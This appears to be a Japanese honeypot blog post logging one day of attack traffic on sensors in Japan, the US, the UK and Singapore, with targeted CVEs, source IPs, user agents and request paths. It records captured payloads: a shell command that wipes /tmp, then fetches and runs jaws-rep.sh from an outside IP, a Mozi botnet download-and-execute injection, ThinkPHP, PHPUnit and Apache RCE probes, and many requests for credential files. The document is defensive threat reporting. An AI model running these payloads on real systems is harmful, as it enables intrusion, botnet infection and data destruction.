2023/07/08 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ

ハニーポット(仮) 観測記録 2023/07/08分です。

特徴

共通

GPONルータの脆弱性を狙うアクセス
CensysInspectによるスキャン行為
.jsへのスキャン行為
/.envへのスキャン行為
/.gitへのスキャン行為

Location:JP

zgrabによるスキャン行為
WordPressへのスキャン行為
UserAgentがHello, Worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget 91.234.99.110/jaws-rep.sh;
chmod 777 /tmp/jaws-rep.sh;
sh /tmp/jaws-rep.sh

Location:US

Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
zgrabによるスキャン行為
Apache Solrへのスキャン行為
Laravelへのスキャン行為
112.124.42.80に関する不正通信

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget 91.234.99.110/jaws-rep.sh;
chmod 777 /tmp/jaws-rep.sh;
sh /tmp/jaws-rep.sh

Location:UK

Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
Atlassian Jira Server/Data Centerの脆弱性(CVE-2021-26086)を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
l9scanによるスキャン行為
Apache Solrへのスキャン行為
Laravelへのスキャン行為

を確認しました。

Location:SG

Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
D-link製品の脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
fasthttpによるスキャン行為
zgrabによるスキャン行為
Apache Solrへのスキャン行為
Laravelへのスキャン行為
112.124.42.80に関する不正通信

を確認しました。

他

アクセス数推移

JP：総アクセス数：417 (前日比：55)
US：総アクセス数：125 (前日比：-26)
UK：総アクセス数：115 (前日比：-130)
SG：総アクセス数：117 (前日比：42)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	2.58.113.24	Germany
260	3.92.92.113	United States
2	3.141.1.234	United States
1	5.196.246.65	France
1	41.233.159.239	Egypt
19	43.154.141.71	Singapore
1	45.56.108.128	United States
1	45.128.232.62	Bulgaria
1	45.156.128.7	Hungary
71	52.159.85.240	United States
1	64.62.197.227	United States
1	64.62.197.237	United States
1	65.49.1.25	United States
1	65.49.20.68	United States
1	80.94.92.42	Romania
1	104.192.0.50	United States
1	107.170.227.15	United States
2	109.237.98.226	Russia
1	111.85.200.109	China
16	135.125.217.54	France
1	156.223.129.14	Egypt
3	165.232.37.112	United States
1	165.232.177.185	United States
1	167.94.145.59	United States
3	176.58.121.82	United States
1	176.107.188.144	Ukraine
2	183.136.225.32	China
1	185.180.143.81	Portugal
1	185.180.143.189	Portugal
1	185.225.74.92	Bulgaria
6	185.254.196.173	Ukraine
1	185.254.196.186	Ukraine
1	188.165.63.130	France
1	192.155.90.118	United States
1	192.241.236.64	United States
1	193.22.96.175	Ukraine
4	193.42.32.151	Bulgaria
1	205.210.31.59	United States
1	205.210.31.131	United States
1	220.198.241.172	China

UserAgent一覧

件数	UserAgent
13	`-`
3	`Go-http-client/1.1`
1	`Hello, World`
70	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36`
19	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36`
3	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0`
1	`Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE`
1	`Mozilla/5.0 (X11; CrOS aarch64 14526.89.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.133 Safari/537.36`
285	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0`
2	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
1	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
1	`Mozilla/5.0 zgrab/0.x`
1	`python-requests/2.25.1`
2	`python-requests/2.28.1`
4	`python-requests/2.28.2`
1	`python-requests/2.31.0`
2	`r00ts3c-owned-you`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`MGLNDD_18.179.20.5_80\n`
1		`\x16\x03\x01\x01H\x01`
11		`\x16\x03\x01`
1	GET	`/.aspnet/DataProtection-Keys/`	HTTP/1.1
1	GET	`/.bumpversion.cfg`	HTTP/1.1
1	GET	`/.cfg/`	HTTP/1.1
1	GET	`/.cfg`	HTTP/1.1
1	GET	`/.codacy.yml`	HTTP/1.1
1	GET	`/.credential`	HTTP/1.1
1	GET	`/.credentials`	HTTP/1.1
1	GET	`/.db.xml`	HTTP/1.1
1	GET	`/.db.yaml`	HTTP/1.1
1	GET	`/.deploy/values.yaml`	HTTP/1.1
1	GET	`/.deployment-config.json`	HTTP/1.1
1	GET	`/.deployment`	HTTP/1.1
1	GET	`/.docker/config.json`	HTTP/1.1
1	GET	`/.editorconfig`	HTTP/1.1
1	GET	`/.env.development`	HTTP/1.1
1	GET	`/.env.dist`	HTTP/1.1
1	GET	`/.env.old`	HTTP/1.1
1	GET	`/.env.prod`	HTTP/1.1
1	GET	`/.env.production`	HTTP/1.1
1	GET	`/.env.project`	HTTP/1.1
1	GET	`/.env.save`	HTTP/1.1
1	GET	`/.env.travis`	HTTP/1.1
29	GET	`/.env`	HTTP/1.1
1	GET	`/.evg.yml`	HTTP/1.1
1	GET	`/.git.json`	HTTP/1.1
1	GET	`/.git/HEAD`	HTTP/1.1
7	GET	`/.git/config`	HTTP/1.1
1	GET	`/.git/configs`	HTTP/1.1
1	GET	`/.golangci.yml`	HTTP/1.1
1	GET	`/.hhconfig`	HTTP/1.1
1	GET	`/.hound.yml`	HTTP/1.1
1	GET	`/.htaccess-dev`	HTTP/1.1
1	GET	`/.htaccess-local`	HTTP/1.1
1	GET	`/.htaccess-marco`	HTTP/1.1
1	GET	`/.htaccess.BAK`	HTTP/1.1
1	GET	`/.htaccess.bak1`	HTTP/1.1
1	GET	`/.htaccess.bak`	HTTP/1.1
1	GET	`/.htaccess.inc`	HTTP/1.1
1	GET	`/.htaccess.old`	HTTP/1.1
1	GET	`/.htaccess.orig`	HTTP/1.1
1	GET	`/.htaccess.sample`	HTTP/1.1
1	GET	`/.htaccess.save`	HTTP/1.1
1	GET	`/.htaccess/`	HTTP/1.1
1	GET	`/.htaccessBAK`	HTTP/1.1
1	GET	`/.htaccessOLD2`	HTTP/1.1
1	GET	`/.htaccessOLD`	HTTP/1.1
1	GET	`/.htaccess_extra`	HTTP/1.1
1	GET	`/.htaccess_orig`	HTTP/1.1
1	GET	`/.htaccess_sc`	HTTP/1.1
1	GET	`/.htaccess`	HTTP/1.1
1	GET	`/.htaccess~`	HTTP/1.1
1	GET	`/.idea/dataSources.xml`	HTTP/1.1
1	GET	`/.idea/deployment.xml`	HTTP/1.1
1	GET	`/.idea/runConfigurations.xml`	HTTP/1.1
1	GET	`/.inc.php`	HTTP/1.1
1	GET	`/.inc`	HTTP/1.1
1	GET	`/.index.php.swp`	HTTP/1.1
1	GET	`/.installed.cfg`	HTTP/1.1
1	GET	`/.isort.cfg`	HTTP/1.1
1	GET	`/.json`	HTTP/1.1
1	GET	`/.localsettings.php.swp`	HTTP/1.1
1	GET	`/.mergesources.yml`	HTTP/1.1
2	GET	`/.mr.developer.cfg`	HTTP/1.1
1	GET	`/.nsconfig`	HTTP/1.1
1	GET	`/.op/config`	HTTP/1.1
1	GET	`/.overcommit.yml`	HTTP/1.1
1	GET	`/.patches/`	HTTP/1.1
1	GET	`/.php-ini`	HTTP/1.1
1	GET	`/.php-version`	HTTP/1.1
1	GET	`/.php3`	HTTP/1.1
1	GET	`/.project-settings.yml`	HTTP/1.1
1	GET	`/.project.xml`	HTTP/1.1
1	GET	`/.s3.yml`	HTTP/1.1
1	GET	`/.s3backupstatus`	HTTP/1.1
1	GET	`/.s3cfg`	HTTP/1.1
1	GET	`/.s3config`	HTTP/1.1
1	GET	`/.settings.php.swp`	HTTP/1.1
1	GET	`/.src/app.js`	HTTP/1.1
1	GET	`/.src/index.js`	HTTP/1.1
1	GET	`/.src/server.js`	HTTP/1.1
1	GET	`/.tx/config`	HTTP/1.1
1	GET	`/.user.ini`	HTTP/1.1
1	GET	`/?phpinfo=1`	HTTP/1.1
1	GET	`/ReportServer`	HTTP/1.1
1	GET	`/ServerList.cfg`	HTTP/1.1
1	GET	`/WEB-INF/classes/hibernate.cfg.xml`	HTTP/1.1
1	GET	`/WEB-INF/hibernate.cfg.xml`	HTTP/1.1
1	GET	`/_profiler/phpinfo`	HTTP/1.1
1	GET	`/_test`	HTTP/1.1
1	GET	`/_tests`	HTTP/1.1
1	GET	`/admin-app/.env`	HTTP/1.1
1	GET	`/airflow.cfg`	HTTP/1.1
1	GET	`/ansible.cfg`	HTTP/1.1
2	GET	`/api/.env`	HTTP/1.1
1	GET	`/api/config.json`	HTTP/1.1
1	GET	`/api/config`	HTTP/1.1
1	GET	`/api/credential.json`	HTTP/1.1
1	GET	`/api/credentials.json`	HTTP/1.1
1	GET	`/app.js`	HTTP/1.1
1	GET	`/app.php`	HTTP/1.1
1	GET	`/app/.env`	HTTP/1.1
1	GET	`/app/config/routes.cfg`	HTTP/1.1
1	GET	`/app/etc/config.xml`	HTTP/1.1
1	GET	`/application/.env`	HTTP/1.1
1	GET	`/apps/.env`	HTTP/1.1
1	GET	`/awstats.conf`	HTTP/1.1
1	GET	`/back/.env`	HTTP/1.1
1	GET	`/backup.cfg`	HTTP/1.1
1	GET	`/cf_scripts/scripts/ajax/ckeditor/ckeditor.js`	HTTP/1.1
1	GET	`/client/get_targets`	HTTP/1.1
1	GET	`/cms/.env`	HTTP/1.1
1	GET	`/common.inc`	HTTP/1.1
1	GET	`/common.xml`	HTTP/1.1
1	GET	`/conf.html`	HTTP/1.1
1	GET	`/conf.inc.php~`	HTTP/1.1
1	GET	`/conf.ini`	HTTP/1.1
1	GET	`/conf.js`	HTTP/1.1
1	GET	`/conf.php.bak`	HTTP/1.1
1	GET	`/conf.php.old`	HTTP/1.1
1	GET	`/conf.php.swp`	HTTP/1.1
1	GET	`/conf.swp`	HTTP/1.1
1	GET	`/conf.txt`	HTTP/1.1
1	GET	`/conf`	HTTP/1.1
1	GET	`/config.inc.php.txt`	HTTP/1.1
1	GET	`/config.inc.txt`	HTTP/1.1
1	GET	`/config.ini.txt`	HTTP/1.1
1	GET	`/config.json`	HTTP/1.1
1	GET	`/config.php.txt`	HTTP/1.1
1	GET	`/config.php`	HTTP/1.1
1	GET	`/config.txt`	HTTP/1.1
1	GET	`/core/.env`	HTTP/1.1
1	GET	`/cp/.env`	HTTP/1.1
1	GET	`/credentials.csv`	HTTP/1.1
1	GET	`/credentials.txt`	HTTP/1.1
1	GET	`/credentials.xml`	HTTP/1.1
1	GET	`/debug.cgi`	HTTP/1.1
1	GET	`/debug.inc`	HTTP/1.1
1	GET	`/debug.ini`	HTTP/1.1
1	GET	`/debug.js`	HTTP/1.1
1	GET	`/debug.log`	HTTP/1.1
1	GET	`/debug.php`	HTTP/1.1
1	GET	`/debug.py`	HTTP/1.1
2	GET	`/debug.txt`	HTTP/1.1
1	GET	`/debug.xml`	HTTP/1.1
1	GET	`/debug/`	HTTP/1.1
1	GET	`/debug/default/view?panel=config`	HTTP/1.1
1	GET	`/debug`	HTTP/1.1
1	GET	`/development/.env`	HTTP/1.1
1	GET	`/docker/.env`	HTTP/1.1
1	GET	`/docs.json`	HTTP/1.1
1	GET	`/downloader/cache.cfg`	HTTP/1.1
1	GET	`/downloader/connect.cfg`	HTTP/1.1
1	GET	`/env.bak`	HTTP/1.1
1	GET	`/enviroments/.env.production`	HTTP/1.1
1	GET	`/enviroments/.env`	HTTP/1.1
1	GET	`/etc/config.ini`	HTTP/1.1
1	GET	`/etc/database.xml`	HTTP/1.1
1	GET	`/export.cfg`	HTTP/1.1
1	GET	`/export_presets.cfg`	HTTP/1.1
6	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/fedex/.env`	HTTP/1.1
1	GET	`/files/`	HTTP/1.1
1	GET	`/frontend_dev.php/$`	HTTP/1.1
1	GET	`/function.js`	HTTP/1.1
1	GET	`/geoserver/web/`	HTTP/1.1
1	GET	`/git/.config`	HTTP/1.1
1	GET	`/index-bak`	HTTP/1.1
1	GET	`/index-test.php`	HTTP/1.1
1	GET	`/index.000`	HTTP/1.1
1	GET	`/index.001`	HTTP/1.1
1	GET	`/index.7z`	HTTP/1.1
1	GET	`/index.backup`	HTTP/1.1
1	GET	`/index.bak`	HTTP/1.1
1	GET	`/index.bz2`	HTTP/1.1
1	GET	`/index.class`	HTTP/1.1
1	GET	`/index.cs`	HTTP/1.1
1	GET	`/index.gz`	HTTP/1.1
1	GET	`/index.htm`	HTTP/1.1
1	GET	`/index.html`	HTTP/1.1
1	GET	`/index.inc`	HTTP/1.1
1	GET	`/index.java`	HTTP/1.1
1	GET	`/index.jsp`	HTTP/1.1
1	GET	`/index.old`	HTTP/1.1
1	GET	`/index.orig`	HTTP/1.1
1	GET	`/index.pHp`	HTTP/1.1
1	GET	`/index.php-bak`	HTTP/1.1
1	GET	`/index.php.`	HTTP/1.1
1	GET	`/index.php.bak`	HTTP/1.1
1	GET	`/index.php/login/`	HTTP/1.1
1	GET	`/index.php3`	HTTP/1.1
1	GET	`/index.php4`	HTTP/1.1
1	GET	`/index.php5`	HTTP/1.1
1	GET	`/index.php`	HTTP/1.1
1	GET	`/index.php~`	HTTP/1.1
1	GET	`/index.rar`	HTTP/1.1
1	GET	`/index.save`	HTTP/1.1
1	GET	`/index.shtml`	HTTP/1.1
1	GET	`/index.tar.bz2`	HTTP/1.1
1	GET	`/index.tar.gz`	HTTP/1.1
1	GET	`/index.tar`	HTTP/1.1
1	GET	`/index.temp`	HTTP/1.1
1	GET	`/index.tgz`	HTTP/1.1
1	GET	`/index.tmp`	HTTP/1.1
1	GET	`/index.vb`	HTTP/1.1
1	GET	`/index.xml`	HTTP/1.1
1	GET	`/index.zip`	HTTP/1.1
1	GET	`/index1.bak`	HTTP/1.1
1	GET	`/index1.htm`	HTTP/1.1
1	GET	`/index2.bak`	HTTP/1.1
1	GET	`/index2.php`	HTTP/1.1
1	GET	`/index2`	HTTP/1.1
1	GET	`/index3.php`	HTTP/1.1
1	GET	`/info.php`	HTTP/1.1
2	GET	`/info.txt`	HTTP/1.1
1	GET	`/js/config.js`	HTTP/1.1
1	GET	`/js/envConfig.js`	HTTP/1.1
1	GET	`/js/prepod.js`	HTTP/1.1
1	GET	`/js/prod.js`	HTTP/1.1
1	GET	`/js/qa.js`	HTTP/1.1
1	GET	`/laravel/.env`	HTTP/1.1
1	GET	`/live_env`	HTTP/1.1
1	GET	`/local/.env`	HTTP/1.1
1	GET	`/localsettings.php.bak`	HTTP/1.1
1	GET	`/localsettings.php.dist`	HTTP/1.1
1	GET	`/localsettings.php.old`	HTTP/1.1
1	GET	`/localsettings.php.save`	HTTP/1.1
1	GET	`/localsettings.php.swp`	HTTP/1.1
1	GET	`/localsettings.php~`	HTTP/1.1
1	GET	`/mirror.cfg`	HTTP/1.1
1	GET	`/mrtg.cfg`	HTTP/1.1
1	GET	`/nginx.conf`	HTTP/1.1
1	GET	`/php-cli.ini`	HTTP/1.1
1	GET	`/php.ini-orig.txt`	HTTP/1.1
1	GET	`/php.ini.sample`	HTTP/1.1
1	GET	`/php.ini_`	HTTP/1.1
1	GET	`/php.ini~`	HTTP/1.1
1	GET	`/php.lnk`	HTTP/1.1
1	GET	`/php.log`	HTTP/1.1
1	GET	`/php/dev/`	HTTP/1.1
1	GET	`/php/php.cgi`	HTTP/1.1
1	GET	`/php4.ini`	HTTP/1.1
1	GET	`/php5.fcgi`	HTTP/1.1
1	GET	`/php5.ini`	HTTP/1.1
1	GET	`/phpinfo.php`	HTTP/1.1
1	GET	`/phpsysinfo/`	HTTP/1.1
1	GET	`/phpunit.xml`	HTTP/1.1
1	GET	`/plugin.php`	HTTP/1.1
1	GET	`/plugins/web.config`	HTTP/1.1
1	GET	`/private/.env`	HTTP/1.1
1	GET	`/protected/data/`	HTTP/1.1
1	GET	`/protected/runtime/`	HTTP/1.1
1	GET	`/protected_access/`	HTTP/1.1
1	GET	`/quikstore.cfg`	HTTP/1.1
1	GET	`/rest/.env`	HTTP/1.1
1	GET	`/robots.txt`	HTTP/1.1
1	GET	`/s3.js`	HTTP/1.1
1	GET	`/script/.env`	HTTP/1.1
1	GET	`/security.xml`	HTTP/1.1
1	GET	`/server.cert`	HTTP/1.1
1	GET	`/server.cfg`	HTTP/1.1
1	GET	`/server.js`	HTTP/1.1
1	GET	`/server.key`	HTTP/1.1
1	GET	`/server.log`	HTTP/1.1
1	GET	`/server.ovpn`	HTTP/1.1
1	GET	`/server.pid`	HTTP/1.1
1	GET	`/server.xml`	HTTP/1.1
1	GET	`/server/config.json`	HTTP/1.1
1	GET	`/server/server.js`	HTTP/1.1
1	GET	`/serverindex.xml`	HTTP/1.1
1	GET	`/servers.xml`	HTTP/1.1
1	GET	`/settings.html`	HTTP/1.1
1	GET	`/settings.php.bak`	HTTP/1.1
1	GET	`/settings.php.dist`	HTTP/1.1
1	GET	`/settings.php.old`	HTTP/1.1
1	GET	`/settings.php.save`	HTTP/1.1
1	GET	`/settings.php.swp`	HTTP/1.1
1	GET	`/settings.php`	HTTP/1.1
1	GET	`/settings.php~`	HTTP/1.1
1	GET	`/settings.py`	HTTP/1.1
1	GET	`/settings.xml`	HTTP/1.1
1	GET	`/shared/.env`	HTTP/1.1
2	GET	`/shell?cd+/tmp;rm+-rf+*;wget+91[.]234[.]99[.]110/jaws-rep.sh;chmod+777+/tmp/jaws-rep.sh;sh+/tmp/jaws-rep.sh`	HTTP/1.1
1	GET	`/sites.ini`	HTTP/1.1
1	GET	`/sites.xml`	HTTP/1.1
1	GET	`/sources/.env`	HTTP/1.1
1	GET	`/startup.cfg`	HTTP/1.1
1	GET	`/styles/prosilver/style.cfg`	HTTP/1.1
1	GET	`/symfony/config/databases.yml`	HTTP/1.1
1	GET	`/symphony/apps/frontend/config/app.yml`	HTTP/1.1
1	GET	`/symphony/config/app.yml`	HTTP/1.1
1	GET	`/symphony/config/databases.yml`	HTTP/1.1
1	GET	`/system/.env`	HTTP/1.1
1	GET	`/systembc/password.php`	HTTP/1.0
1	GET	`/test.asp`	HTTP/1.1
1	GET	`/test.aspx`	HTTP/1.1
1	GET	`/upload.asp`	HTTP/1.1
1	GET	`/upload.aspx`	HTTP/1.1
1	GET	`/v3/time`	HTTP/1.1
1	GET	`/web.Debug.config`	HTTP/1.1
1	GET	`/web.Release.config`	HTTP/1.1
1	GET	`/web.config.bak`	HTTP/1.1
1	GET	`/web.config.bakup`	HTTP/1.1
1	GET	`/web.config.old`	HTTP/1.1
1	GET	`/web.config.temp`	HTTP/1.1
1	GET	`/web.config.tmp`	HTTP/1.1
1	GET	`/web.config`	HTTP/1.1
1	GET	`/wp-config.php.txt`	HTTP/1.1
19	HEAD	`/Core/Skin/Login.aspx`	HTTP/1.1
1	POST	`/.env.development`	HTTP/1.1
1	POST	`/.env.dist`	HTTP/1.1
1	POST	`/.env.old`	HTTP/1.1
1	POST	`/.env.prod`	HTTP/1.1
1	POST	`/.env.production`	HTTP/1.1
1	POST	`/.env.project`	HTTP/1.1
1	POST	`/.env.save`	HTTP/1.1
1	POST	`/.env`	HTTP/1.1
1	POST	`/GponForm/diag_Form?images/`	HTTP/1.1
1	POST	`/admin-app/.env`	HTTP/1.1
1	POST	`/api/.env`	HTTP/1.1
1	POST	`/app/.env`	HTTP/1.1
1	POST	`/application/.env`	HTTP/1.1
1	POST	`/apps/.env`	HTTP/1.1
1	POST	`/back/.env`	HTTP/1.1
2	POST	`/boaform/admin/formLogin`	HTTP/1.1
1	POST	`/cms/.env`	HTTP/1.1
1	POST	`/core/.env`	HTTP/1.1
1	POST	`/cp/.env`	HTTP/1.1
1	POST	`/development/.env`	HTTP/1.1
1	POST	`/docker/.env`	HTTP/1.1
1	POST	`/enviroments/.env.production`	HTTP/1.1
1	POST	`/enviroments/.env`	HTTP/1.1
1	POST	`/fedex/.env`	HTTP/1.1
1	POST	`/laravel/.env`	HTTP/1.1
1	POST	`/live_env`	HTTP/1.1
1	POST	`/local/.env`	HTTP/1.1
1	POST	`/private/.env`	HTTP/1.1
1	POST	`/rest/.env`	HTTP/1.1
1	POST	`/script/.env`	HTTP/1.1
1	POST	`/shared/.env`	HTTP/1.1
1	POST	`/sources/.env`	HTTP/1.1
1	POST	`/system/.env`	HTTP/1.1

Location:US

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	2.58.113.24	Germany
1	13.48.248.35	United States
2	45.79.128.205	United States
1	45.79.181.94	United States
1	45.79.181.104	United States
1	45.79.181.179	United States
1	45.79.181.223	United States
1	45.79.181.251	United States
1	45.88.90.145	Bulgaria
1	45.128.232.62	Bulgaria
16	51.77.247.119	France
12	51.79.29.48	Canada
10	54.36.115.221	France
2	54.37.79.75	France
1	59.173.181.208	China
1	60.191.125.35	China
1	64.90.159.190	United States
1	64.110.106.95	Switzerland
1	65.49.1.99	United States
1	66.175.213.4	United States
1	71.6.134.230	United States
2	74.82.47.5	United States
4	80.76.51.68	Bulgaria
1	91.245.254.198	Romania
1	104.28.226.5	United States
1	104.28.226.8	United States
1	107.172.233.136	United States
1	115.55.8.67	China
1	121.202.195.176	Hong Kong
7	143.198.81.229	United States
1	156.199.113.69	Egypt
1	156.199.248.80	Egypt
1	156.223.137.116	Egypt
2	162.142.125.11	United States
1	162.243.129.16	United States
7	165.232.177.185	United States
2	167.94.146.58	United States
4	170.64.163.140	United States
1	172.104.11.34	United States
1	172.105.128.13	United States
3	176.58.127.14	United States
1	178.62.11.69	United States
2	192.155.90.220	United States
1	192.241.235.19	United States
1	193.233.21.25	Russia
1	194.165.16.72	Panama
1	197.33.1.20	Egypt
1	197.62.157.206	Egypt
1	205.210.31.13	United States
1	213.5.130.61	France
13	213.109.202.66	United Kingdom
1	213.232.114.123	Germany

UserAgent一覧

件数	UserAgent
32	`-`
1	`Go-http-client/1.1`
16	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.110 Safari/537.36 Vivaldi/2.7.1628.30`
10	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36`
13	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36`
25	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0`
1	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/110.0`
4	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
1	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0`
2	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
1	`Mozilla/5.0 zgrab/0.x`
6	`Mozilla/5.0`
4	`python-requests/2.28.2`
5	`r00ts3c-owned-you`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`27;wget%20http[:]//%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$`	HTTP/1.0
1		`MGLNDD_34.68.118.83_80\n`
2		`\x03`
1		`\x16\x03\x01\x01\xfb\x01`
23		`\x16\x03\x01`
1	GET	`/.env.backup`	HTTP/1.1
1	GET	`/.env.local`	HTTP/1.1
1	GET	`/.env.save`	HTTP/1.1
26	GET	`/.env`	HTTP/1.1
5	GET	`/.git/config`	HTTP/1.1
2	GET	`/1.php`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>`	HTTP/1.1
1	GET	`/API/.env`	HTTP/1.1
1	GET	`/_ignition/execute-solution`	HTTP/1.1
1	GET	`/admin/.env`	HTTP/1.1
1	GET	`/api/.env`	HTTP/1.1
1	GET	`/app/.env`	HTTP/1.1
1	GET	`/bedesk1.1/.env`	HTTP/1.1
1	GET	`/blog/.env`	HTTP/1.1
1	GET	`/boaform/admin/formLogin?username=adminisp&psd=adminisp`	HTTP/1.0
1	GET	`/bundle.js`	HTTP/1.1
3	GET	`/cdn-cgi/trace`	HTTP/1.1
2	GET	`/client/get_targets`	HTTP/1.1
1	GET	`/config/getuser?index=0`	HTTP/1.1
1	GET	`/console/`	HTTP/1.1
1	GET	`/core/.env`	HTTP/1.1
1	GET	`/database/.env`	HTTP/1.1
1	GET	`/dev/.env`	HTTP/1.1
1	GET	`/druid/index.html`	HTTP/1.1
1	GET	`/env/.env`	HTTP/1.1
6	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/files/`	HTTP/1.1
2	GET	`/geoip/`	HTTP/1.1
1	GET	`/geoserver/web/`	HTTP/1.1
1	GET	`/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21`	HTTP/1.1
1	GET	`/public/.env`	HTTP/1.1
5	GET	`/shell?cd+/tmp;rm+-rf+*;wget+91[.]234[.]99[.]110/jaws-rep.sh;chmod+777+/tmp/jaws-rep.sh;sh+/tmp/jaws-rep.sh`	HTTP/1.1
1	GET	`/solr/admin/info/system?wt=json`	HTTP/1.1
1	GET	`/test/bedesk1.1/.env`	HTTP/1.1
3	GET	`/upl.php`	HTTP/1.1
2	GET	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	HEAD	`/.env`	HTTP/1.1
1	HEAD	`http[:]//112[.]124[.]42[.]80:63435/`	HTTP/1.1
2	POST	`/Autodiscover/Autodiscover.xml`	HTTP/1.1
3	POST	`/boaform/admin/formLogin`	HTTP/1.1
1	POST	`/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh`	HTTP/1.1
1	POST	`/goform/formJsonAjaxReq`	HTTP/1.1
1	POST	`/goform/set_LimitClient_cfg`	HTTP/1.1
2	POST	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
2	PRI	`*`	HTTP/2.0

Location:UK

送信元IPアドレス一覧

件数	送信元IPアドレス	国
2	4.17.224.134	United States
1	20.196.219.62	United States
7	35.216.225.253	United States
4	45.55.37.106	United States
1	45.79.128.205	United States
1	45.79.181.104	United States
1	45.79.181.179	United States
1	45.88.90.144	Bulgaria
1	45.88.90.145	Bulgaria
1	45.128.232.62	Bulgaria
1	45.227.254.49	Belize
4	47.243.182.187	United States
9	51.79.29.48	Canada
6	54.36.115.221	France
13	54.37.79.75	France
1	64.62.197.77	United States
1	64.62.197.84	United States
1	64.62.197.146	United States
1	66.42.32.252	United States
1	66.175.213.4	United States
1	104.28.226.8	United States
1	107.173.82.6	United States
3	109.74.204.11	United States
2	109.237.98.226	Russia
1	114.228.81.79	China
1	138.68.80.252	United States
1	138.68.81.206	United States
16	138.68.133.118	United States
1	157.230.99.127	United States
1	157.230.99.133	United States
2	162.142.125.224	United States
1	172.104.11.4	United States
2	172.104.11.46	United States
1	172.104.11.51	United States
1	172.105.128.13	United States
1	178.128.115.233	United States
1	185.180.143.81	Portugal
2	192.155.90.118	United States
1	192.155.90.220	United States
1	192.241.206.104	United States
1	193.233.21.25	Russia
1	198.235.24.129	United States
1	198.235.24.235	United States
